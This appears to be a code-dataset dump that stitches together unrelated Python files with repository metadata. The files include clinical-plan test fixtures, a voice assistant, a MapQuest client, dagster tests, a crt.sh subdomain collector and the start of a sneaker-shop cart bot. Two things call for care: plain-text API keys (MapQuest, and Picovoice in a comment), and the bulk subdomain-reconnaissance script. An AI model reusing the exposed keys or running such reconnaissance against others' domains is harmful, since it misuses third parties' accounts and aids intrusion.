complex_plan = Plan(title="CAP")
complex_plan.add_state("admission_state", State(label="admission", default=None))
complex_plan.add_step("discharge", EndStep(
title="Discharge",
actions=[PreRunStateAction(state=complex_plan.get_state("admission_state"), state_value="discharged")]
))
complex_plan.add_step("itu", EndStep(
title="ITU",
actions=[PreRunStateAction(state=complex_plan.get_state("admission_state"), state_value="itu")]
))
complex_plan.add_step("admission", StartStep(
title="Patient admission",
actions=[PreRunStateAction(state=complex_plan.get_state("admission_state"), state_value="admitted")],
next_step=complex_plan.get_step("catheter_check")
))
complex_plan.add_step("flowchart", Step(
title="CAP logic map",
visual=Visual(
elements=[
JourneyMap(route_only=False, start_step="admission")
]),
exclude_from_chart=True
))
complex_plan.add_schema("catheter",
DataSchema(
schema={
"systolic_bp": {"type": "number"},
"score": {"type": "number"}
},
y_names=["score"]
)
)
from easul.algorithm import ScoreAlgorithm
complex_plan.add_algorithm("catheter",
ScoreAlgorithm(
title="Catheter algorithm",
schema=complex_plan.get_schema("catheter"),
factors=[OperatorFactor(operator=operator.gt, input_field="systolic_bp", value=90,
penalty=1, title="High systolic BP")]
)
)
complex_plan.add_step("catheter_check", AlgorithmStep(
title="Catheter check",
actions=[PreRunStateAction(state=complex_plan.get_state("admission_state"), state_value="catheter_check")],
algorithm=complex_plan.get_algorithm("catheter"),
source=complex_plan.get_source("catheter"),
decision=BinaryDecision(
true_step=complex_plan.get_step("itu"),
false_step=complex_plan.get_step("discharge")
)
))
complex_plan.add_step("flowchart", Step(
title="Diabetes logic map",
visual=Visual(
elements=[
JourneyMap(route_only=False, start_step="admission")
]),
exclude_from_chart=True
))
from easul.source import ConstantSource
complex_plan.add_source("catheter", ConstantSource(title="Catheter data", data={"systolic_bp": 80}))
return complex_plan
def complex_plan_with_ml_no_metadata(tempdir):
plan = _complex_plan_with_ml()
plan.add_algorithm("progression", StoredAlgorithm(filename=tempdir + "/diabetes.eal",
title="Diabetes progression likelihood",
definition=diabetes_progression_algorithm
))
plan.add_visual("model_scope", Visual(
title="Diabetes model scope",
algorithm=plan.get_algorithm("progression"),
elements=model_scope_elements,
metadata_filename=tempdir+"/test_model.eam",
metadata_dataset="easul.tests.example.diabetes_progression_dataset"
))
plan.add_visual("row_scope", Visual(
title="Diabetes row scope",
algorithm=plan.get_algorithm("progression"),
elements=row_scope_elements,
metadata_filename=tempdir + "/test_row.eam",
metadata_dataset="easul.tests.example.diabetes_progression_dataset"
))
return plan
def _complex_plan_with_ml():
from easul.decision import BinaryDecision
from easul.plan import Plan
from easul.state import State
from easul.step import EndStep, StartStep, Step, AlgorithmStep, PreStep, VisualStep
from easul.visual import Visual
from easul.action import PreRunStateAction
import os
complex_plan_with_ml = Plan(title="CAP")
complex_plan_with_ml.add_state("admission_state", State(label="admission", default=None))
complex_plan_with_ml.add_state("progression", State(label="progression", default=None))
complex_plan_with_ml.add_step("discharge", EndStep(
title="Discharge",
actions=[PreRunStateAction(state=complex_plan_with_ml.get_state("admission_state"), state_value="discharged")]
))
complex_plan_with_ml.add_step("itu", EndStep(
title="ITU",
actions=[PreRunStateAction(state=complex_plan_with_ml.get_state("admission_state"), state_value="itu")]
))
complex_plan_with_ml.add_step("admission", StartStep(
title="Patient admission",
actions=[PreRunStateAction(state=complex_plan_with_ml.get_state("admission_state"), state_value="admitted")],
next_step=complex_plan_with_ml.get_step("catheter_check")
))
complex_plan_with_ml.add_step("flowchart", Step(
title="CAP logic map",
visual=Visual(
elements=[
JourneyMap(route_only=False, start_step="admission")
]),
exclude_from_chart=True
))
complex_plan_with_ml.add_schema("catheter",
DataSchema(
schema={
"systolic_bp": {"type": "number"},
"score": {"type": "number"}
},
y_names=["score"]
)
)
complex_plan_with_ml.add_step("progression_low", PreStep(
title="Diabetes progression low",
actions=[PreRunStateAction(state=complex_plan_with_ml.get_state("progression"), state_value="low")],
next_step=complex_plan_with_ml.get_step("discharge")
))
complex_plan_with_ml.add_step("progression_high", PreStep(
title="Diabetes progression high",
actions=[PreRunStateAction(state=complex_plan_with_ml.get_state("progression"), state_value="high")],
next_step=complex_plan_with_ml.get_step("itu")
))
complex_plan_with_ml.add_step("progression_check", AlgorithmStep(
algorithm=complex_plan_with_ml.get_algorithm("progression"),
title="Progression ML",
actions=[
PreRunStateAction(state=complex_plan_with_ml.get_state("progression"), state_value="pending"),
ResultStoreAction()
],
decision=BinaryDecision(
true_step=complex_plan_with_ml.get_step("progression_high"),
false_step=complex_plan_with_ml.get_step("progression_low")
),
source=complex_plan_with_ml.get_source("progression"),
visual=complex_plan_with_ml.get_visual("row_scope")
))
from easul.algorithm import ScoreAlgorithm, StoredAlgorithm
complex_plan_with_ml.add_algorithm("catheter",
ScoreAlgorithm(
title="Catheter algorithm",
schema=complex_plan_with_ml.get_schema("catheter"),
factors=[
OperatorFactor(title="High blood pressure", operator=operator.gt, input_field="systolic_bp", value=90,
penalty=1)]
)
)
complex_plan_with_ml.add_step("catheter_check", AlgorithmStep(
title="Catheter check",
actions=[
PreRunStateAction(state=complex_plan_with_ml.get_state("admission_state"), state_value="catheter_check")],
algorithm=complex_plan_with_ml.get_algorithm("catheter"),
source=complex_plan_with_ml.get_source("catheter"),
decision=BinaryDecision(
true_step=complex_plan_with_ml.get_step("progression_check"),
false_step=complex_plan_with_ml.get_step("discharge")
)
))
from easul.source import ConstantSource
complex_plan_with_ml.add_source("catheter", ConstantSource(title="Catheter data", data={"systolic_bp": 80}))
complex_plan_with_ml.add_source("progression", ConstantSource(title="Diabetes progression data", data={}))
complex_plan_with_ml.add_step("flowchart", Step(
title="Diabetes logic map",
visual=Visual(
elements=[
JourneyMap(route_only=False, start_step="admission")
]),
exclude_from_chart=True
))
return complex_plan_with_ml
def complex_plan_with_ml():
plan = _complex_plan_with_ml()
plan.add_algorithm("progression", StoredAlgorithm(filename=EXAMPLE_PATH + "/metadata/diabetes.eal",
title="Diabetes progression likelihood",
definition=diabetes_progression_algorithm
))
plan.add_step("overview", VisualStep(
title="Model",
visual=plan.get_visual("model_scope")
))
plan.add_visual("model_scope", Visual(
title="Diabetes model scope",
algorithm=plan.get_algorithm("progression"),
elements=model_scope_elements,
metadata_filename=EXAMPLE_PATH + "/metadata/model_scope.emd",
metadata_dataset="easul.tests.example.diabetes_progression_dataset"
))
plan.add_visual("row_scope", Visual(
title="Diabetes row scope",
algorithm=plan.get_algorithm("progression"),
elements=row_scope_elements,
metadata_filename=EXAMPLE_PATH + "/metadata/row_scope.emd",
metadata_dataset="easul.tests.example.diabetes_progression_dataset"
))
return plan
curb65_schema = DataSchema(
schema={
"confusion": {"type": "boolean", "required": True},
"urea": {"type": "number", "required": True},
"rr": {"type": "number", "required": True},
"sbp": {"type": "number", "required": True},
"dbp": {"type": "number", "required": True},
"age": {"type": "number", "required": True},
"score": {"type": "number", "required": True}
}, y_names=["score"])
prog_input_data = {"age": 59, "sex": 2, "bmi": 32.1, "bp": 101, "s1": 157, "s2": 93.2, "s3": 38, "s4": 4, "s5": 4.9,
"s6": 87}
no_prog_input_data = {"age": 23, "sex": 1, "bmi": 20.1, "bp": 78, "s1": 77, "s2": 93.2, "s3": 38, "s4": 4, "s5": 4.9,
"s6": 37}
def curb65_score_algorithm():
from easul.algorithm import logic, factor
from easul import expression
import operator
return logic.ScoreAlgorithm(
title="CURB65",
factors=[
factor.OperatorFactor(penalty=1, operator=operator.eq, value=1, input_field="confusion", title="Confusion"),
factor.OperatorFactor(penalty=1, operator=operator.gt, value=19, input_field="urea", title="High urea",),
factor.OperatorFactor(penalty=1, operator=operator.ge, value=30, input_field="rr", title="High respiratory rate"),
factor.ExpressionFactor(penalty=1, expression=expression.OrExpression(
expressions=[
expression.OperatorExpression(operator=operator.lt, value=90, input_field="sbp"),
expression.OperatorExpression(operator=operator.le, value=60, input_field="dbp")
]
), title="Low blood pressure"
),
factor.OperatorFactor(penalty=1, operator=operator.ge, value=65, input_field="age", title="Age >= 65")
],
schema=curb65_schema,
start_score=0
)
| rcfgroup/easul | easul/tests/example.py | example.py | py | 21,533 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "os.path.dirname",
"line_number": 23,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 23,
"usage_type": "attribute"
},
{
"api_name": "easul.algorithm.ClassifierAlgorithm",
"line_number": 32,
"usage_type": "call"
},
{
"api_name": "skle... |
7341734490 | import sys
import os
import ctypes
from ctypes import (
c_double,
c_int,
c_float,
c_char_p,
c_int32,
c_uint32,
c_void_p,
c_bool,
POINTER,
_Pointer, # type: ignore
Structure,
Array,
c_uint8,
c_size_t,
)
import pathlib
from typing import List, Union
# Load the library
def _load_shared_library(lib_base_name: str):
# Construct the paths to the possible shared library names
_base_path = pathlib.Path(__file__).parent.resolve()
# Searching for the library in the current directory under the name "libllama" (default name
# for llamacpp) and "llama" (default name for this repo)
_lib_paths: List[pathlib.Path] = []
# Determine the file extension based on the platform
if sys.platform.startswith("linux"):
_lib_paths += [
_base_path / f"lib{lib_base_name}.so",
]
elif sys.platform == "darwin":
_lib_paths += [
_base_path / f"lib{lib_base_name}.so",
_base_path / f"lib{lib_base_name}.dylib",
]
elif sys.platform == "win32":
_lib_paths += [
_base_path / f"{lib_base_name}.dll",
]
else:
raise RuntimeError("Unsupported platform")
cdll_args = dict() # type: ignore
# Add the library directory to the DLL search path on Windows (if needed)
# Try to load the shared library, handling potential errors
for _lib_path in _lib_paths:
print("_lib_path = ", _lib_path)
if _lib_path.exists():
try:
return ctypes.CDLL(str(_lib_path), **cdll_args)
except Exception as e:
raise RuntimeError(f"Failed to load shared library '{_lib_path}': {e}")
raise FileNotFoundError(
f"Shared library with base name '{lib_base_name}' not found"
)
# Specify the base name of the shared library to load
_lib_base_name = "model"
# Load the library
_lib = _load_shared_library(_lib_base_name)
# LLAMA_API struct llama_context_params llama_context_default_params();
def inference(argv: c_char_p):
return _lib.inference(argv)
#_lib.inference.argtypes = [c_int, c_char_p]
_lib.inference.restype = c_char_p
if __name__ == "__main__":
inference(bytes( "stories15M.bin", encoding = 'utf-8'))
| mengbingrock/shepherd | shepherd/llama2c_py/llama2c_py.py | llama2c_py.py | py | 2,276 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "pathlib.Path",
"line_number": 29,
"usage_type": "call"
},
{
"api_name": "typing.List",
"line_number": 32,
"usage_type": "name"
},
{
"api_name": "pathlib.Path",
"line_number": 32,
"usage_type": "attribute"
},
{
"api_name": "sys.platform.startswith",
... |
31418095220 | from Word2Vec.Word2VecGenerator import Word2VecGenerator
import glob
from JsonParse.JsonParser import JsonParser
import json as Json
class TrainingComponentGenerator:
__largest_n_words = 0
__astNode2Vec_size = 0
__number_of_vector_code2vec = 0
def __init__(self, astNode2Vec_size, number_of_vector_code2vec):
self.__astNode2Vec_size = astNode2Vec_size
self.__number_of_vector_code2vec = number_of_vector_code2vec
def generateTrainingComponent(self, dataFolderPath):
dataset = []
for file in glob.glob(dataFolderPath):
dataset.append(file)
commits = list()
parser = JsonParser()
for data in dataset:
json = parser.openJson(data)
commitData = json
commits.extend(commitData)
astSentences = list()
sourceCodeSentences = list()
astNodeDict = list()
for commit in commits:
self.__collectWord2VecData(commit, sourceCodeSentences, astSentences, astNodeDict)
self.__word2vecModelGenerate(sourceCodeSentences, astSentences)
astNodeDictSet = set(astNodeDict) # convert it as set data type.
astNodeDict = list(astNodeDictSet)
jsonString = Json.dumps(astNodeDict)
with open('Outcome/Models/AstNodeDictionary.json', 'w') as f:
f.write(jsonString)
print("Training Components are built")
def __collectWord2VecData(self, commit, sourceCodeSentences, astSentences, astNodeDict):
tasks = commit['tasks']
commitAstNodeDic = commit['astNodeDic']
astNodeDict.extend(commitAstNodeDic)
for task in tasks:
taskElementTreeSet = task['taskElementTreeSet']
for taskElement in taskElementTreeSet:
astNodeSentence = taskElement['astNodeSentence']
astNodeSenAsList = self.__stringToList(astNodeSentence)
astSentences.append(astNodeSenAsList)
sourceCode = taskElement['sourceCode']
sourceCodeAsList = self.__tokenizedCodes(sourceCode)
sourceCodeSentences.append(sourceCodeAsList)
if (self.__largest_n_words < len(sourceCodeAsList)):
self.__largest_n_words = len(sourceCodeAsList)
def __word2vecModelGenerate(self, sourceCodeSentences, astSentences):
# CODE2VEC
code2Vec = Word2VecGenerator()
code2Vec.generateModel(sourceCodeSentences, vector_size=self.__number_of_vector_code2vec, window=4, min_count=1,
Type='CodeType')
print("Code2Vec is generated")
# AST2Vec
astNode2Vec = Word2VecGenerator()
astNode2Vec.generateModel(astSentences, vector_size=self.__astNode2Vec_size, window=2, min_count=1,
Type="AstType")
print("AST2Vec is generated")
return astNode2Vec, code2Vec
def __stringToList(self, string):
listRes = list(string.split(" "))
return listRes
def __tokenizedCodes(self, sourceCode):
sourceCodeAsList = self.__stringToList(sourceCode)
sourceCodeAsList = [x for x in sourceCodeAsList if x != '']
return sourceCodeAsList
def getMaximumNumberOfWord(self):
return self.__largest_n_words
| ZzillLongLee/TsGen | TrainingDataGenerator/TrainingComponentGenerator.py | TrainingComponentGenerator.py | py | 3,300 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "glob.glob",
"line_number": 18,
"usage_type": "call"
},
{
"api_name": "JsonParse.JsonParser.JsonParser",
"line_number": 23,
"usage_type": "call"
},
{
"api_name": "json.dumps",
"line_number": 38,
"usage_type": "call"
},
{
"api_name": "Word2Vec.Word2Ve... |
23497341801 | ################ Henri Lahousse ################
# voice assistant
# 05/31/2022
# libraries
import struct
import pyaudio
import pvporcupine # for wakeword
import pvrhino # for situations
porcupine = None
pa = None
audio_stream = None
rhino = None
# documentation picovoice https://picovoice.ai/docs/
# create model wakeword https://console.picovoice.ai/ppn
# create model situation https://console.picovoice.ai/rhn
access_key = 'ENTER_KEY' # find on picovoice website https://console.picovoice.ai/access_key // my_key 0nevFcYH3LlyYTajYWkG44d+vLWdm5Njxe8tr6xNrj/Kn9/m2qOjeg==
def voice_ass():
porcupine = pvporcupine.create(
access_key=access_key,
keyword_paths=['ENTER_PATH'] # download model from website and extract file for wakeword detection // my_path /home/pi/Downloads/wakeword.ppn
)
# setup
def setup(path):
rhino = pvrhino.create(
access_key=access_key,
context_path=path)
return rhino
rhino_drive = setup('ENTER_PATH') # download model from website and extract for situation recognission // /home/pi/Downloads/drive.rhn
rhino_roof = setup('ENTER_PATH') # = // /home/pi/Downloads/roof.rhn
rhino_smartlights = setup('ENTER_PATH') # = // /home/pi/Downloads/smartlights.rhn
pa = pyaudio.PyAudio()
# prepare audio for processing
audio_stream = pa.open(
rate=porcupine.sample_rate,
channels=1,
format=pyaudio.paInt16,
input=True,
frames_per_buffer=porcupine.frame_length)
# prepare audio for processing
def audio(rhino):
audio_stream_rhn = pa.open(
rate=rhino.sample_rate,
channels=1,
format=pyaudio.paInt16,
input=True,
frames_per_buffer=rhino.frame_length)
return audio_stream_rhn
audio_sm = audio(rhino_smartlights)
audio_rf = audio(rhino_roof)
audio_dr = audio(rhino_drive)
while True:
pcm = audio_stream.read(porcupine.frame_length)
pcm = struct.unpack_from("h" * porcupine.frame_length, pcm)
keyword_index = porcupine.process(pcm)
# finalizing audio
def fin(aud, rhino):
rh = aud.read(rhino.frame_length)
rh = struct.unpack_from("h" * rhino.frame_length, rh)
is_finalized = rhino.process(rh)
return is_finalized
is_fin_sm = fin(audio_sm, rhino_smartlights)
is_fin_rf = fin(audio_rf, rhino_roof)
is_fin_dr = fin(audio_dr, rhino_drive)
# results, get the understood situation returned
def rs(is_fin, rhino):
if is_fin:
inference = rhino.get_inference() # if if_fin is True we get the inference
if inference.is_understood: # use intent and slots if it understands
intent = inference.intent # intent is a string
slots = inference.slots # slots is a dictionary
return intent, slots
# returns wakeword
if keyword_index == 0:
return 1
rs(is_fin_sm, rhino_smartlights)
rs(is_fin_rf, rhino_roof)
rs(is_fin_dr, rhino_drive)
porcupine.delete()
rhino.delete()
| lahousse/ONWARD | software/voice-assistant/voice-assis.py | voice-assis.py | py | 3,324 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "pvporcupine.create",
"line_number": 24,
"usage_type": "call"
},
{
"api_name": "pvrhino.create",
"line_number": 31,
"usage_type": "call"
},
{
"api_name": "pyaudio.PyAudio",
"line_number": 40,
"usage_type": "call"
},
{
"api_name": "pyaudio.paInt16",
... |
26336618129 | import datetime
import smtplib
import time
import requests
import api_keys
MY_LAT = 51.53118881973776
MY_LONG = -0.08949588609011068
response = requests.get(url="http://api.open-notify.org/iss-now.json")
data = response.json()
longitude = data["iss_position"]["longitude"]
latitude = data["iss_position"]["latitude"]
print(latitude, longitude)
parameters = {
"lat": MY_LAT,
"lng": MY_LONG,
"formatted": 0
}
response = requests.get(url=f"https://api.sunrise-sunset.org/json", params=parameters)
data = response.json()
sunrise = int(data["results"]["sunrise"].split("T")[1].split(":")[0])
sunset = int(data["results"]["sunset"].split("T")[1].split(":")[0])
def is_nearby():
if (MY_LAT - 5 <= float(latitude) <= MY_LAT + 5) and (MY_LONG - 5 <= float(longitude) <= MY_LONG + 5):
return True
else:
return False
def is_night():
now = datetime.datetime.now().hour
if now >= sunset or now <= sunrise:
return True
else:
return False
while True:
time.sleep(60)
if is_nearby() and is_night():
with smtplib.SMTP(host="smtp.gmail.com") as conn:
conn.starttls()
conn.login(user=api_keys.my_email, password=api_keys.password)
conn.sendmail(from_addr=api_keys.my_email, to_addrs=api_keys.my_email, msg="update \n\nis nearby")
| Zoom30/100-python | Day 33/Day 33.py | Day 33.py | py | 1,385 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "requests.get",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "requests.get",
"line_number": 21,
"usage_type": "call"
},
{
"api_name": "datetime.datetime.now",
"line_number": 35,
"usage_type": "call"
},
{
"api_name": "datetime.datetime",
... |
70387249063 | from aplication.models import historical_record
from aplication.dto.dto_record import dto_record
import datetime as dt
def register(_record:dto_record):
historical = historical_record()
historical.registration_date = dt.date.today()
historical.registration_time = dt.datetime.now().strftime('%H:%M:%S')
historical.turn = _record.turn
historical.active = True
historical.save()
| GustavoRosario/pass | pj/aplication/controles/record.py | record.py | py | 414 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "aplication.dto.dto_record.dto_record",
"line_number": 5,
"usage_type": "name"
},
{
"api_name": "aplication.models.historical_record",
"line_number": 6,
"usage_type": "call"
},
{
"api_name": "datetime.date.today",
"line_number": 7,
"usage_type": "call"
},
... |
31329677612 | import requests
from requests import HTTPError
import yaml
import json
import os
def load_config():
config_path = 'api_config.yaml'
with open(os.path.join(os.getcwd(), config_path), mode='r') as yaml_file:
config = yaml.safe_load(yaml_file)
return config
def auth():
conf = load_config()['api_handle']
url = conf['url']+conf['endpoint_auth']
data = json.dumps(conf['credentials'])
headers = {"content-type": "application/json"}
try:
result = requests.post(url, data=data, headers=headers)
result.raise_for_status()
token = "JWT " + result.json()['access_token']
return request(token)
except HTTPError:
print('Exception with:')
print(conf['url']+conf['endpoint'])
def get(url, date, headers):
try:
result = requests.get(url
, data=json.dumps({"date": date})
, headers=headers
, timeout=10)
return result.json()
except HTTPError:
print('Error')
def save(inp):
name = inp[0]['date']
path = os.path.join(os.getcwd(), f'data/{name}')
if not os.path.exists(path):
try:
os.makedirs(path)
except OSError:
print("Creation of the directory %s failed" % path)
else:
print("Successfully created the directory %s" % path)
with open(f'{path}/out_{name}.json', 'w') as json_file:
json.dump(inp, json_file)
def request(token):
conf = load_config()['api_handle']
url = conf['url'] + conf['endpoint_get']
start_date = conf['start_date']
headers = conf['headers']
headers['authorization'] = token
result = None
if isinstance(result, dict) \
and (result['message'] == 'No out_of_stock items for this date'):
print('Empty Date')
else:
result = get(url, start_date, headers)
save(result)
if __name__ == '__main__':
auth()
| daniiche/DE | hmwrk4/airflow/dags/api_handle_airflow.py | api_handle_airflow.py | py | 1,987 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "os.path.join",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 10,
"usage_type": "attribute"
},
{
"api_name": "os.getcwd",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "yaml.safe_load",
"line_number... |
496206437 | import os
import pytest
from dagster_aws.emr import EmrJobRunner, emr_pyspark_resource
from dagster_pyspark import pyspark_resource, pyspark_solid
from moto import mock_emr
from dagster import (
DagsterInvalidDefinitionError,
ModeDefinition,
RunConfig,
execute_pipeline,
pipeline,
)
from dagster.seven import mock
from dagster.utils.test import create_test_pipeline_execution_context
@pyspark_solid
def example_solid(context):
list_p = [('John', 19), ('Jennifer', 29), ('Adam', 35), ('Henry', 50)]
rdd = context.resources.pyspark.spark_context.parallelize(list_p)
res = rdd.take(2)
for name, age in res:
context.log.info('%s: %d' % (name, age))
@pyspark_solid(name='blah', description='this is a test', config={'foo': str, 'bar': int})
def other_example_solid(context):
list_p = [('John', 19), ('Jennifer', 29), ('Adam', 35), ('Henry', 50)]
rdd = context.resources.pyspark.spark_context.parallelize(list_p)
res = rdd.take(2)
for name, age in res:
context.log.info('%s: %d' % (name, age))
@pipeline(
mode_defs=[
ModeDefinition('prod', resource_defs={'pyspark': emr_pyspark_resource}),
ModeDefinition('local', resource_defs={'pyspark': pyspark_resource}),
]
)
def example_pipe():
example_solid()
other_example_solid()
def test_local():
result = execute_pipeline(
example_pipe,
environment_dict={'solids': {'blah': {'config': {'foo': 'a string', 'bar': 123}}},},
run_config=RunConfig(mode='local'),
)
assert result.success
@mock_emr
@mock.patch('dagster_aws.emr.emr.EmrJobRunner.wait_for_steps_to_complete')
def test_pyspark_emr(mock_wait):
run_job_flow_args = dict(
Instances={
'InstanceCount': 1,
'KeepJobFlowAliveWhenNoSteps': True,
'MasterInstanceType': 'c3.medium',
'Placement': {'AvailabilityZone': 'us-west-1a'},
'SlaveInstanceType': 'c3.xlarge',
},
JobFlowRole='EMR_EC2_DefaultRole',
LogUri='s3://mybucket/log',
Name='cluster',
ServiceRole='EMR_DefaultRole',
VisibleToAllUsers=True,
)
# Doing cluster setup outside of a solid here, because run_job_flow is not yet plumbed through
# to the pyspark EMR resource.
job_runner = EmrJobRunner(region='us-west-1')
context = create_test_pipeline_execution_context()
cluster_id = job_runner.run_job_flow(context, run_job_flow_args)
result = execute_pipeline(
example_pipe,
environment_dict={
'solids': {'blah': {'config': {'foo': 'a string', 'bar': 123}}},
'resources': {
'pyspark': {
'config': {
'pipeline_file': __file__,
'pipeline_fn_name': 'example_pipe',
'cluster_id': cluster_id,
'staging_bucket': 'dagster-scratch-80542c2',
'region_name': 'us-west-1',
}
}
},
},
run_config=RunConfig(mode='prod'),
)
assert result.success
assert mock_wait.called_once
def test_bad_requirements_txt():
with pytest.raises(DagsterInvalidDefinitionError) as exc_info:
execute_pipeline(
example_pipe,
environment_dict={
'solids': {'blah': {'config': {'foo': 'a string', 'bar': 123}}},
'resources': {
'pyspark': {
'config': {
'requirements_file_path': 'DOES_NOT_EXIST',
'pipeline_file': __file__,
'pipeline_fn_name': 'example_pipe',
'cluster_id': 'some_cluster_id',
'staging_bucket': 'dagster-scratch-80542c2',
'region_name': 'us-west-1',
}
}
},
},
run_config=RunConfig(mode='prod'),
)
assert 'The requirements.txt file that was specified does not exist' in str(exc_info.value)
# We have to manually stop the pyspark context here because we interrupted before resources
# were cleaned up, and so stop() was never called on the spark session.
from pyspark.sql import SparkSession
SparkSession.builder.getOrCreate().stop()
@pytest.mark.skip
def test_do_it_live_emr():
result = execute_pipeline(
example_pipe,
environment_dict={
'solids': {'blah': {'config': {'foo': 'a string', 'bar': 123}}},
'resources': {
'pyspark': {
'config': {
'pipeline_file': __file__,
'pipeline_fn_name': 'example_pipe',
'cluster_id': os.environ.get('AWS_EMR_JOB_FLOW_ID'),
'staging_bucket': 'dagster-scratch-80542c2',
'region_name': 'us-west-1',
}
}
},
},
run_config=RunConfig(mode='prod'),
)
assert result.success
| helloworld/continuous-dagster | deploy/dagster_modules/libraries/dagster-aws/dagster_aws_tests/emr_tests/test_pyspark.py | test_pyspark.py | py | 5,158 | python | en | code | 2 | github-code | 36 | [
{
"api_name": "dagster_pyspark.pyspark_solid",
"line_number": 19,
"usage_type": "name"
},
{
"api_name": "dagster_pyspark.pyspark_solid",
"line_number": 28,
"usage_type": "call"
},
{
"api_name": "dagster.pipeline",
"line_number": 37,
"usage_type": "call"
},
{
"api_... |
5232319809 | from openpyxl import Workbook
wb = Workbook()
ws = wb.active
# [현재까지 작성된 최종 성적 데이터]
data = [["학번", "출석", "퀴즈1", "퀴즈2", "중간고사", "기말고사", "프로젝트"],
[1,10,8,5,14,26,12],
[2,7,3,7,15,24,18],
[3,9,5,8,8,12,4],
[4,7,8,7,17,21,18],
[5,7,8,7,16,25,15],
[6,3,5,8,8,17,0],
[7,4,9,10,16,27,18],
[8,6,6,6,15,19,17],
[9,10,10,9,19,30,19],
[10,9,8,8,20,25,20]]
for x in range(1, len(data)+1) :
for y in range(1, len(data[0])+1):
ws.cell(row=x, column=y, value=data[x-1][y-1])
# 1. 퀴즈 2 점수를 10으로 수정
for idx, cell in enumerate(ws["D"]):
if idx == 0: # 제목인 경우 skip
continue
cell.value = 10
# 2. 총점 정보 추가
ws["H1"] = "총점"
ws["I1"] = "성적"
for idx, score in enumerate(data, start=1):
if idx == 1:
continue
sum_val = sum(score[1:]) - score[3] + 10 # 총점
ws.cell(row=idx, column=8).value="=SUM(B{}:G{})".format(idx, idx)
# 총점 별로 성적 부과
grade = None
if sum_val >= 90:
grade = "A"
elif sum_val >= 80:
grade = "B"
elif sum_val >= 70:
grade = "C"
else:
grade = "D"
# 출석 5점 미만이면 F
if score[1] < 5:
grade = "F"
ws.cell(row=idx, column=9).value = grade
wb.save("scores.xlsx") | OctoHoon/PythonStudy_rpa | rpa_basic/1_excel/17_quiz.py | 17_quiz.py | py | 1,382 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "openpyxl.Workbook",
"line_number": 3,
"usage_type": "call"
}
] |
12177872909 | import requests
import urllib.parse
main_api = "https://www.mapquestapi.com/directions/v2/route?"
key = "p0Modq3JoAtVS6BXK5P5CinXWhJNUQwI"
while True:
orig = input("Starting Location: ")
dest = input("Destination: ")
url = main_api + urllib.parse.urlencode({
"key" : key,
"from" : orig,
"to" : dest
})
json_data = requests.get(url).json()
json_status = json_data["info"]["statuscode"]
print(f"URL: {url}")
if json_status == 0:
print(f"API Status: {json_status} = A successfull route call.\n") | JerickoDeGuzman/MapQuest-Feature-Enhancement | tempdir/referenceFiles/mapquest_parse-json_3.py | mapquest_parse-json_3.py | py | 561 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "urllib.parse.parse.urlencode",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "urllib.parse.parse",
"line_number": 10,
"usage_type": "attribute"
},
{
"api_name": "urllib.parse",
"line_number": 10,
"usage_type": "name"
},
{
"api_name": "req... |
11867021952 | # -----------------------------------------------------------------------------
# main.py
#
# Hung-Ruey Chen 109971346
# -----------------------------------------------------------------------------
import sys, os
import ply.lex as lex
import ply.yacc as yacc
from token_def import *
# Build the lexer
def main():
log.debug(sys.argv[1])
sys.stderr = open(os.devnull, 'w')
# lex.lex(debug=True)
lex.lex()
yacc.yacc()
sys.stderr = sys.__stderr__
r = open(sys.argv[1])
code = ""
for line in r:
code += line.strip() + "\n"
logging.debug(code)
try:
lex.input(code)
while True:
token = lex.token()
if not token: break
logging.debug(token)
# ast = yacc.parse(code, debug=True)
ast = yacc.parse(code)
ast.execute()
except Exception as e:
logging.debug(e)
r.close()
if __name__ == '__main__':
main() | vbigmouse/CSE307 | HW5/main.py | main.py | py | 949 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "sys.argv",
"line_number": 14,
"usage_type": "attribute"
},
{
"api_name": "sys.stderr",
"line_number": 15,
"usage_type": "attribute"
},
{
"api_name": "os.devnull",
"line_number": 15,
"usage_type": "attribute"
},
{
"api_name": "ply.lex.lex",
"line... |
75263396265 | import requests
from urllib.parse import urlparse
import concurrent.futures
# Extract domain from a URL
def extract_domain(url):
return urlparse(url).netloc
# Fetch subdomains from crt.sh
def get_subdomains_from_crtsh(domain):
try:
response = requests.get(f"https://crt.sh/?q=%.{domain}&output=json")
if response.status_code == 200:
json_data = response.json()
# Extract name_value (subdomain) from each certificate and filter wildcard entries
return [item['name_value'] for item in json_data if '*' in item['name_value']]
return []
except requests.RequestException:
return []
def main():
# Load domains from the input file
with open('h1_web_fix1.txt', 'r') as file:
urls = file.readlines()
domains = [extract_domain(url.strip()) for url in urls]
wildcard_subdomains = []
# Using ThreadPoolExecutor to speed up fetching subdomains
with concurrent.futures.ThreadPoolExecutor(max_workers=100) as executor:
future_to_domain = {executor.submit(get_subdomains_from_crtsh, domain): domain for domain in domains}
for future in concurrent.futures.as_completed(future_to_domain):
wildcard_entries = future.result()
wildcard_subdomains.extend(wildcard_entries)
# Save wildcard subdomains to an output file
with open('wildcard_subdomains.txt', 'w') as out_file:
for subdomain in wildcard_subdomains:
out_file.write(f"{subdomain}\n")
print(f"Found {len(wildcard_subdomains)} wildcard subdomains. Saved to wildcard_subdomains.txt.")
if __name__ == "__main__":
main()
| RepoRascal/test | run.py | run.py | py | 1,650 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "urllib.parse.urlparse",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "requests.get",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "requests.RequestException",
"line_number": 18,
"usage_type": "attribute"
},
{
"api_name": "conc... |
22644746365 | import requests
import time
from bs4 import BeautifulSoup as bs
import re
import webbrowser
sizes = [7, 9.5, 11]
new_arrivals_page_url = 'https://www.theclosetinc.com/collections/new-arrivals'
base_url = 'https://www.theclosetinc.com'
post_url = 'https://www.theclosetinc.com/cart/add.js'
keywords = ['yeezy', 'inertia']
